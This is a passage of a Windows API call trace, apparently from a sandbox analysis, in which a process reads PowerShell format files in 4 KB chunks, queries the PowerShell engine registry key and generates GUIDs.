	[0756.752] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.752] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.752] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.753] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.753] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.753] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.753] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.754] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.754] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.754] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.756] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.756] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.756] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.757] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.757] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.762] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.762] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.762] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.763] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.763] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.763] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.764] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.764] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.764] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.764] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.765] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.765] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.766] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.766] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.766] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.767] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.767] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.767] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.768] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.768] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.768] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.769] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.769] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.769] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.770] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.770] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.771] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.771] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.771] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.772] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.772] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0xf37, lpOverlapped=0x0) returned 1
	[0756.772] ReadFile (in: hFile=0x2dc, lpBuffer=0x32ef87f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32ef87f*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0756.773] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0756.773] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0756.773] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0756.773] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0756.773] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0756.773] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0756.773] RegCloseKey (hKey=0x2dc) returned 0x0
	[0756.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.780] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xd8cb35cb, Data2=0xd40e, Data3=0x41b9, Data4=([0]=0x8f, [1]=0x2, [2]=0x1c, [3]=0xb6, [4]=0xc, [5]=0xbb, [6]=0xa0, [7]=0xb9))) returned 0x0
	[0756.781] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf46ab40f, Data2=0x499, Data3=0x4dc1, Data4=([0]=0xbc, [1]=0x3d, [2]=0x4f, [3]=0x7d, [4]=0x83, [5]=0x53, [6]=0x92, [7]=0x29))) returned 0x0
	[0756.792] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x87f9925c, Data2=0xa25b, Data3=0x482d, Data4=([0]=0xa3, [1]=0x5c, [2]=0x3, [3]=0xc6, [4]=0xf7, [5]=0x4d, [6]=0x9f, [7]=0x18))) returned 0x0
	[0756.797] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x16f758cf, Data2=0x555b, Data3=0x4297, Data4=([0]=0xaa, [1]=0x2f, [2]=0x49, [3]=0x94, [4]=0x20, [5]=0xbc, [6]=0x8c, [7]=0xb3))) returned 0x0
	[0756.807] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x46b9e98, Data2=0x64c0, Data3=0x47d7, Data4=([0]=0xa1, [1]=0x7d, [2]=0x8a, [3]=0xa6, [4]=0x50, [5]=0xed, [6]=0x1a, [7]=0x3f))) returned 0x0
	[0756.808] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xff280130, Data2=0xdb99, Data3=0x4a3d, Data4=([0]=0x8d, [1]=0xd0, [2]=0x8b, [3]=0x9b, [4]=0xe6, [5]=0xce, [6]=0x29, [7]=0x24))) returned 0x0
	[0756.832] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3a8e89ae, Data2=0xdad0, Data3=0x4e53, Data4=([0]=0x86, [1]=0x43, [2]=0xbc, [3]=0x93, [4]=0x56, [5]=0xaa, [6]=0xce, [7]=0x39))) returned 0x0
	[0756.835] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x55f7c8f3, Data2=0xfb4b, Data3=0x4aec, Data4=([0]=0xb8, [1]=0x2c, [2]=0xc3, [3]=0x47, [4]=0xa0, [5]=0x60, [6]=0x9d, [7]=0xf4))) returned 0x0
	[0756.836] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x186d9e4a, Data2=0x85e0, Data3=0x4754, Data4=([0]=0x85, [1]=0x46, [2]=0x92, [3]=0xab, [4]=0x8a, [5]=0xd7, [6]=0xa, [7]=0x24))) returned 0x0
	[0756.837] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xdef5cbde, Data2=0x48d4, Data3=0x43a7, Data4=([0]=0x85, [1]=0x2, [2]=0x45, [3]=0xc4, [4]=0x25, [5]=0xe3, [6]=0xa1, [7]=0x76))) returned 0x0
	[0756.838] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc5545b1b, Data2=0x6417, Data3=0x4e27, Data4=([0]=0x92, [1]=0x10, [2]=0x72, [3]=0xc8, [4]=0x78, [5]=0x90, [6]=0x7c, [7]=0x45))) returned 0x0
	[0756.838] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xde687ca5, Data2=0x1543, Data3=0x42bd, Data4=([0]=0xb2, [1]=0x4b, [2]=0xcd, [3]=0xb1, [4]=0xe9, [5]=0x61, [6]=0x3e, [7]=0xc8))) returned 0x0
	[0756.839] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3b1ed526, Data2=0x6670, Data3=0x4046, Data4=([0]=0x85, [1]=0x5b, [2]=0x51, [3]=0xe0, [4]=0x64, [5]=0x4b, [6]=0x94, [7]=0x9b))) returned 0x0
	[0756.839] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf0285135, Data2=0x7e69, Data3=0x479e, Data4=([0]=0xa8, [1]=0xbb, [2]=0x92, [3]=0x17, [4]=0x2a, [5]=0xa7, [6]=0x5f, [7]=0x65))) returned 0x0
	[0756.840] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x15ca5e4e, Data2=0x6f3e, Data3=0x44b7, Data4=([0]=0x9b, [1]=0xbd, [2]=0xdf, [3]=0xd3, [4]=0x6, [5]=0x4b, [6]=0x21, [7]=0xd3))) returned 0x0
	[0756.851] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc8f4f74e, Data2=0xfadb, Data3=0x45e3, Data4=([0]=0x86, [1]=0xbf, [2]=0xff, [3]=0x7a, [4]=0xb8, [5]=0x53, [6]=0x27, [7]=0x63))) returned 0x0
	[0756.873] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb3dd684d, Data2=0x753f, Data3=0x43f3, Data4=([0]=0x86, [1]=0x65, [2]=0x2d, [3]=0xa6, [4]=0xea, [5]=0x76, [6]=0x65, [7]=0xbb))) returned 0x0
	[0756.882] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x8548547, Data2=0x318b, Data3=0x4bd0, Data4=([0]=0xb4, [1]=0x97, [2]=0xf1, [3]=0xa7, [4]=0xbf, [5]=0x17, [6]=0x48, [7]=0xff))) returned 0x0
	[0756.882] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa898d183, Data2=0x336c, Data3=0x44ef, Data4=([0]=0x88, [1]=0xcb, [2]=0xfb, [3]=0x32, [4]=0x7, [5]=0x58, [6]=0xf3, [7]=0xab))) returned 0x0
	[0756.883] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x55730b39, Data2=0xc0cb, Data3=0x4f58, Data4=([0]=0xb2, [1]=0xb2, [2]=0xb7, [3]=0xf9, [4]=0xba, [5]=0x85, [6]=0x14, [7]=0x11))) returned 0x0
	[0756.883] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6b58cf5b, Data2=0x541a, Data3=0x4ca4, Data4=([0]=0x88, [1]=0x7d, [2]=0x66, [3]=0xe8, [4]=0x79, [5]=0x8b, [6]=0xaf, [7]=0xd7))) returned 0x0
	[0756.884] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x72821e9d, Data2=0x1bc8, Data3=0x4212, Data4=([0]=0xb5, [1]=0xd0, [2]=0xf6, [3]=0x1c, [4]=0x65, [5]=0x47, [6]=0xba, [7]=0x5d))) returned 0x0
	[0756.885] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc14711c8, Data2=0x4951, Data3=0x43c2, Data4=([0]=0x92, [1]=0xd1, [2]=0xbd, [3]=0x47, [4]=0x32, [5]=0x57, [6]=0xd8, [7]=0x7b))) returned 0x0
	[0756.885] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe8ccb636, Data2=0xcad4, Data3=0x43a2, Data4=([0]=0xac, [1]=0x1a, [2]=0x70, [3]=0x5f, [4]=0x56, [5]=0x19, [6]=0xc4, [7]=0xab))) returned 0x0
	[0756.886] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb0e50251, Data2=0xfe94, Data3=0x40e1, Data4=([0]=0x85, [1]=0xdc, [2]=0xa4, [3]=0xc6, [4]=0xa9, [5]=0xc0, [6]=0xfd, [7]=0x5b))) returned 0x0
	[0756.886] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0756.887] GetFileType (hFile=0x2dc) returned 0x1
	[0756.887] SetErrorMode (uMode=0x1) returned 0x1
	[0756.887] GetFileType (hFile=0x2dc) returned 0x1
	[0756.887] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.888] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.889] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.889] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.890] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.891] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.891] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.891] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.891] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.893] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.893] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.894] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.894] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.894] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.894] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.895] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.895] ReadFile (in: hFile=0x2dc, lpBuffer=0x3747c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x3747c58*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
